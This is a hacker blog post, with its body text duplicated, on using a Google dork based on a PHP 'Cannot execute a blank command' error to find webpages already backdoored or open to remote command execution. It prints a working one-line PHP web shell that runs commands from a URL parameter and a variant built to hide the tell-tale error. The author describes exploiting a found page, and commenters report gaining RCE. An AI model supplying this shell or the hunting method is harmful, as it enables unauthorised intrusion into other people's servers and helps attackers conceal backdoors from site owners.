Guyzzz,
Here I would like to introduce a trick+google dork for find Pre-Backdoored webpages and some RCE [Remote Command Execution] Enabled webpages. Many of hackers and programmers are not aware of this Error message that originates when backdooring or programming.
Here a sample error message...
Here the lame c0de I used for Backdoor/Code this page.
This above code will create a error message,
"Warning: system() [function.system]: Cannot execute a blank command".
This error message is our KEY to hunt RCE's in Backdoored webpages and RCE vulnerable Web. Applications.
Here is screenshot of g00gl3 d0rk :p
If you want hide this error message in your backdoored webpage use this code,
I hope you have enjoyed this article... Please write your reviews, comments & criticisms...
<<<<<<<<<< (C) _TERMINAL_CODERS_ (C) >>>>>>>>>>
Here I would like to introduce a trick+google dork for find Pre-Backdoored webpages and some RCE [Remote Command Execution] Enabled webpages. Many of hackers and programmers are not aware of this Error message that originates when backdooring or programming.
Here a sample error message...
Here the lame c0de I used for Backdoor/Code this page.
<?php
print system($_GET['cmd']);
?>
This above code will create a error message,
"Warning: system() [function.system]: Cannot execute a blank command".
This error message is our KEY to hunt RCE's in Backdoored webpages and RCE vulnerable Web. Applications.
Here is screenshot of g00gl3 d0rk :p
If you want hide this error message in your backdoored webpage use this code,
<?php
if(isset($_GET['cmd']))
{
print system($_GET['cmd']);
}
?>
I got one Backdoored/RCE vulnerabled web page...
This is the Screenshot after exploit this Backdoor/vulnerability...
<<<<<<<<<< (C) _TERMINAL_CODERS_ (C) >>>>>>>>>>
2 comments
Write commentsNice article bozz. I got some RCE by usingg this dork.
ReplyI have seen this error messages manytimes. But didn't know it is for RCE. Thanks dude.
Reply